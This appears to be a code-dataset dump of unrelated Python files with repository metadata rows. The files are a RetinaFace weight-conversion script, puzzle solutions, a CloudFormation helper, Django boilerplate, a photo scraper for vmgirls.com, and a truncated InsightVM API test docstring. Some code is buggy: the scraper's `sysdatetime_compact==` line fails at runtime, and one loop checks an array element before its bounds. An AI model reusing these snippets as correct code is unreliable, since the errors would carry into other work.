yaml_dump('_env.yaml', env)
| [
"[email protected]"
] | |
a296c689355de9ff44465c89010087d206693bda | e15d63ccde04e7458bff5af1bdad63a5c699b489 | /example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py | 17e4e530621f5d1100de117f9e520503564c3aba | [
"WTFPL"
] | permissive | ddddwee1/TorchSUL | 775b6a2b1e4ab7aac25a3f0411de83affc257af5 | 6c7cd41b14fc8b746983e8b981d1ba4d08370ca2 | refs/heads/master | 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,870 | py | import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
def initialize(self, chn, stride=1, shortcut=False):
self.bn0 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c3 = M.ConvLayer(1, chn*4, usebias=False)
self.shortcut = shortcut
if shortcut:
self.sc = M.ConvLayer(1, chn*4, stride=stride, usebias=False)
def forward(self, inp):
if self.shortcut:
inp = self.bn0(inp)
inp = self.act(inp)
x2 = x = self.c1(inp)
x = self.c2(x)
x = self.c3(x)
sc = self.sc(inp)
x = sc + x
else:
x = self.bn0(inp)
x = self.act(x)
x2 = x = self.c1(x)
x = self.c2(x)
x = self.c3(x)
x = inp + x
return x, x2
class Stage(M.Model):
def initialize(self, outchn, num_units, stride):
self.units = nn.ModuleList()
for i in range(num_units):
self.units.append(Unit(outchn, stride=stride if i==0 else 1, shortcut = i==0))
def forward(self, x):
for i,u in enumerate(self.units):
if i==0:
x, x2 = u(x)
else:
x, _ = u(x)
return x, x2
class DETHead(M.Model):
def initialize(self):
self.c11 = M.ConvLayer(3, 256, batch_norm=True)
self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c22 = M.ConvLayer(3, 128, batch_norm=True)
self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c32 = M.ConvLayer(3, 128, batch_norm=True)
self.act = M.Activation(M.PARAM_RELU)
def forward(self, x):
x1 = self.c11(x)
x2 = self.c21(x)
x3 = self.c31(x2)
x3 = self.c32(x3)
x2 = self.c22(x2)
x = torch.cat([x1, x2, x3], dim=1)
x = self.act(x)
return x
class RegressHead(M.Model):
def initialize(self):
self.c1 = M.ConvLayer(1,4)
self.c2 = M.ConvLayer(1,8)
self.c3 = M.ConvLayer(1,20)
def forward(self, x):
prob = self.c1(x)
bbox = self.c2(x)
kpts = self.c3(x)
prob = prob.view(prob.shape[0],2,prob.shape[2]*2,prob.shape[3])
prob = F.softmax(prob, dim=1)
prob = prob.view(prob.shape[0],4,-1, prob.shape[3])
return prob, bbox, kpts
class Detector(M.Model):
def initialize(self):
self.bn0 = M.BatchNorm()
self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.pool = M.MaxPool2D(3, 2)
self.stage1 = Stage(64, num_units=3, stride=1)
self.stage2 = Stage(128, num_units=4, stride=2)
self.stage3 = Stage(256, num_units=6, stride=2)
self.stage4 = Stage(512, num_units=3, stride=2)
self.bn1 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det3 = DETHead()
self.head32 = RegressHead()
self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c3_upsampling = M.NNUpSample(2)
self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det2 = DETHead()
self.head16 = RegressHead()
self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c2_upsampling = M.NNUpSample(2)
self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det1 = DETHead()
self.head8 = RegressHead()
def forward(self, x):
x = self.bn0(x)
x = self.c1(x)
x = self.pool(x)
x, _ = self.stage1(x)
x, _ = self.stage2(x)
x, f1 = self.stage3(x)
x, f2 = self.stage4(x)
x = self.bn1(x)
x = self.act(x)
fc3 = x = self.ssh_c3_lateral(x)
d3 = x = self.det3(x)
scr32, box32, lmk32 = self.head32(d3)
fc2 = self.ssh_c2_lateral(f2)
x = self.ssh_c3_upsampling(fc3)
x = x[:,:,:fc2.shape[2],:fc2.shape[3]]
plus100 = x = fc2 + x
fc2_aggr = x = self.ssh_c2_aggr(x)
d2 = x = self.det2(x)
scr16, box16, lmk16 = self.head16(d2)
fc1 = self.ssh_m1_red_conv(f1)
x = self.ssh_c2_upsampling(fc2_aggr)
x = x[:,:,:fc1.shape[2],:fc1.shape[3]]
x = fc1 + x
fc1_aggr = x = self.ssh_c1_aggr(x)
d1 = x = self.det1(x)
scr8, box8, lmk8 = self.head8(d1)
results = [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
return results
if __name__=='__main__':
net = Detector()
net.eval()
x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
_ = net(x)
# net.bn_eps(1e-5)
# net.backbone.det1.bn_eps(2e-5)
res = {}
ps = net.named_parameters()
for p in ps:
name, p = p
res[name] = p
ps = net.named_buffers()
for p in ps:
name, p = p
res[name] = p
def get_bn(l1, l2):
a = []
b = []
a.append(l1+'.weight')
a.append(l1+'.bias')
a.append(l1+'.running_mean')
a.append(l1+'.running_var')
b.append(l2+'_gamma')
b.append(l2+'_beta')
b.append(l2+'_moving_mean')
b.append(l2+'_moving_var')
return a, b
def get_conv(l1, l2, bias=False):
a = [l1 + '.weight']
b = [l2 + '_weight']
if bias:
a.append(l1+'.bias')
b.append(l2+'_bias')
return a,b
def get_layer(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2%('conv')))
res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
return res
def get_convbn(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2, bias=bias))
res.append(get_bn(l1 + '.bn', l2 + '_bn'))
return res
def get_unit(l1, l2, sc=False):
res = []
res.append(get_bn(l1+'.bn0', l2+'_bn1'))
res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
if sc:
res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
return res
def get_stage(l1, l2, blocknum):
res = []
for i in range(blocknum):
res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
return res
def get_dethead(l1, l2):
res = []
res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
return res
def get_regress(l1, l2):
res = []
res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
return res
def totonoi(l):
# print(l)
a = []
b = []
for i in l:
a += i[0]
b += i[1]
return a,b
l = []
l.append(get_bn('bn0', 'bn_data'))
l.append(get_conv('c1.conv', 'conv0'))
l.append(get_bn('c1.bn', 'bn0'))
l += get_stage('stage1', 'stage1', 3)
l += get_stage('stage2', 'stage2', 4)
l += get_stage('stage3', 'stage3', 6)
l += get_stage('stage4', 'stage4', 3)
l.append(get_bn('bn1', 'bn1'))
l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
l += get_dethead('det3', 'ssh_m3_det')
l += get_regress('head32', 'face_rpn_%s_stride32')
l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
l += get_dethead('det2', 'ssh_m2_det')
l += get_regress('head16', 'face_rpn_%s_stride16')
l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
l += get_dethead('det1', 'ssh_m1_det')
l += get_regress('head8', 'face_rpn_%s_stride8')
a,b = totonoi(l)
# print(a,b)
import source
for i,j in zip(a,b):
# print(i,j)
value = source.res[j].asnumpy()
# print(value.shape)
# print(res[i].shape)
res[i].data[:] = torch.from_numpy(value)[:]
# net.bn_eps(2e-5)
y = net(x)
print(y[0])
print(y[0].shape)
M.Saver(net).save('./model_r50/r50_retina.pth')
| [
"[email protected]"
] | |
46bd95d09f6bc8aecede6db2b326fc90533f3af9 | 45467e07e77131f631d0865046dcc4d18f483601 | /src/Hackerearth/round_2/A.py | a766bae20c7b6478ffb22d212ff53cd5256fddb7 | [] | no_license | bvsbrk/Algos | 98374e094bd3811579276d25a82bbf2c0f046d96 | cbb18bce92054d57c0e825069ef7f2120a9cc622 | refs/heads/master | 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | if __name__ == '__main__':
for _ in range(int(input().strip())):
n = int(input().strip())
x = n
arr = [int(i) for i in input().strip().split()]
arr = arr[::-1]
i = 0
while arr[i] == 0 and i < n:
i += 1
x -= 1
if i == n - 1:
print(0)
else:
ans = []
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
# neg sgn
if n % 2 == 0:
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
else:
if arr[i] < 0:
ans.append(1)
else:
ans.append(-1)
print(*ans)
| [
"[email protected]"
] | |
6ce151591e20779df71ce25110bc3831ce51c59a | b792f600ed4e50f34e65e4f334cf7a32d319cc0e | /2017/day11.py | cf2d1b7780f769b1e96bacb18b46b9ecb825122d | [] | no_license | daniel70/AoC | d577f490559d4a0f0d24567bd796117e1aac94ec | ef704a4f6e90168cdc2a91e894583a96e9a6c371 | refs/heads/master | 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 711 | py | directions = {
'n': (0, 1),
'ne': (1, 0.5),
'se': (1, -0.5),
's': (0, -1),
'sw': (-1, -0.5),
'nw': (-1, 0.5),
}
def distance(instructions: list[str]) -> tuple[int, int]:
origin = [0, 0]
furthest = 0
for direction in instructions:
dx, dy = directions[direction]
origin[0] += dx
origin[1] += dy
x, y = origin
furthest = max(furthest, abs(x) + max(int(abs(y)) - abs(x) // 2, 0))
steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
return steps, furthest
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
| [
"[email protected]"
] | |
5432391a83b8c960663d3cef2f2aa55994ff307a | c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56 | /crescent/functions/get_att.py | 704a83a8c9e664be800a85836e5778252c98e7a2 | [
"Apache-2.0"
] | permissive | mpolatcan/crescent | 405936ec001002e88a8f62d73b0dc193bcd83010 | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | refs/heads/master | 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
def __init__(self):
super(GetAtt, self).__init__(
fn_name=GetAtt.__name__,
field_order=[self.Resource.__name__, self.Attribute.__name__]
)
def Resource(self, resource_id: Union[str, AnyFn]):
return self._set_field(self.Resource.__name__, resource_id)
def Attribute(self, attribute: Union[str, AnyFn]):
return self._set_field(self.Attribute.__name__, attribute)
| [
"[email protected]"
] | |
6e3877952188cded94c414eb37f6d19ebeb95534 | 5462142b5e72cb39bea5b802dd46f55357c4ea84 | /test_pic/vmgirls/dl_vmgirls_pic.py | 499ac3f8cef5a386fe97d91b59fd55f04f358de3 | [] | no_license | qqmadeinchina/myhomeocde | a0996ba195020da9af32613d6d2822b049e515a0 | 291a30fac236feb75b47610c4d554392d7b30139 | refs/heads/master | 2023-03-23T05:28:53.076041 | 2020-08-24T08:39:00 | 2020-08-24T08:39:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,874 | py | # -*- coding: utf-8 -*-
# @time :2020/8/17 9:56
# @Author:老萝卜
# @file:dl_vmgirls_pic
# @Software:%{PRODUICT_NAME}
'''
爬取https://www.vmgirls.com/所有图片
'''
import time
import requests
from lxml import etree
import os
import json
basepath_picsave="e:\\temp\\pythontest\\vmgirls\\"
headers={
"user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
}
sysdatetime=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
sysdate=time.strftime('%Y-%m-%d',time.localtime(time.time()))
systime=time.strftime('%H:%M:%S',time.localtime(time.time()))
sysdatetime_compact==time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
# 保存文本内容
def save_html(content,path,oprtye="a",encode="utf-8"):
with open(path,oprtye,encoding=encode) as file:
file.write(content)
# 第一步,请求网络 - 获取网络返回的数据
def get_page(url,encode="utf-8"):
html = requests.get(url,headers=headers).content.decode(encode) # 需要打开网站的编码格式,把拿到的数据进行解码,否m则出现乱码
return html
# 解析数据首页
def xpath_toppage(response):
pageslist=[]
html=etree.HTML(response)
# a_list=html.xpath("/a")
# # 将<a></a>信息保存
# temp_list=[]
# for item in a_list:
# str0=etree.tostring(item,encoding="utf-8").decode("utf-8")
# temp_list.append(str0)
# temp_str="\n".join(temp_list)
# save_html(temp_str,"page_a_content.txt","w")
urllist=html.xpath("//a[@class='media-content']/@href")
for url in urllist:
newurl = "https://www.vmgirls.com/" + url
if newurl not in pageslist:
pageslist.append(newurl)
return pageslist
# 创建目录
def createdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
# 解析每个人的页面
def xpath_pages(response):
pagelist = []
html = etree.HTML(response)
title=html.xpath("//h1[@class='post-title h3']/text()")[0]
author=html.xpath("//a[@class='author-popup']/text()")
# urllist=html.xpath("//a[class='nc-light-gallery-item']/@href")
urllist=html.xpath(f"//a[@title='{title}']/@href")
# print("author=",author)
# print("urllist=",urllist)
savepath=basepath_picsave+title+"\\"
createdir(savepath)
return (savepath,urllist)
def savepic(filepath,url):
req = requests.get(url,headers=headers)
with open(filepath, "wb") as file:
file.write(req.content)
def savejson(data,filepath,oprtype="a",encode="utf-8"):
with open(filepath,oprtype,encoding=encode) as fjson:
json.dump(data,fjson,)
def main():
url="https://www.vmgirls.com/"
response=get_page(url)
save_html(response,f".\\www.vmgirls.com.{sysdate}.html","w")
if response=="":
print("网页打开失败")
return
pageslist=xpath_toppage(response)
# print("pageslist=",pageslist)
picurllist=[]
for picsurl in pageslist:
resp = get_page(picsurl)
save_html(resp,"1.html","w")
picpath,urllist=xpath_pages(resp)
# print("urllist=",urllist)
for picurl in urllist:
filename=picpath+picurl.split("/")[-1]
picurl1="https://www.vmgirls.com/"+picurl
picurllist.append((filename,picurl1))
# print("picurllist=", picurllist)
# print("(filename,picurl1)=",filename,picurl1)
# print("picurllist=",picurllist)
# temp_str="\n".join(picurllist)
# save_html(temp_str,"urllist","w")
savejson(picurllist,f"picurllist_{sysdatetime_compact}.json","w")
# with open("picurllist.json","r") as fjson:
# data=json.load(fjson)
# print("data=",data)
for filepath,pic_url in picurllist:
savepic(filepath,pic_url)
if __name__=="__main__":
main() | [
"[email protected]"
] | |
8114f87ea4d123ce369f1ad9b8352b6eaf865dbf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03208/s325634445.py | 323b17ee4ad8a29bda1ed175bcbbe1278f12231d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | def resolve():
n, k = map(int, input().split())
H_sort = list(sorted([int(input()) for _ in range(n)],reverse=True))
ans = 10**9
for i in range(n-k+1):
ans = min(ans, H_sort[i]-H_sort[i+k-1])
print(ans)
resolve() | [
"[email protected]"
] | |
64a803604b6d762457fbc84462c8185a3f0425aa | 7a42d40a351824464a3c78dc0c3e78bbd8e0a92f | /bigdog_blog/manage.py | f00bf03a35f34d705c8b341ce90fdc096c01ada7 | [] | no_license | AhMay/DerekBlogLearn | 6595063eafbc237b932e187b5cb3ad8ff32637fc | fdd5ea2fc5732cdc82ad006f7be0a2a1f30d0ba9 | refs/heads/master | 2020-07-09T05:20:33.283672 | 2019-09-29T10:10:23 | 2019-09-29T10:10:23 | 203,891,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bigdog_blog.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
a143fc16f6331dc078310d40e66a6ceb4909e318 | acc9d729e0182b17023e9660457eed0e19f4f828 | /test/test_token_resource.py | 6855ae9531f7996b2e7633ed1cc0a9aede6033b2 | [] | no_license | secuwave/nexpose_client | 2f00907ef3ffea33c8e9f5cc2543e708f349de6c | 5ceff219ae03cadb5407dc48d8858ffa56bb3463 | refs/heads/master | 2020-05-22T13:54:22.675479 | 2019-05-13T09:12:09 | 2019-05-13T09:12:09 | 186,369,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,871 | py | # coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representation State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"api.json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using a Base64 encoded hash of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. | `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. | `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. ### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. | | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... ``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. Allowed operations are returned and may be performed on the resource. | | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. | Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned 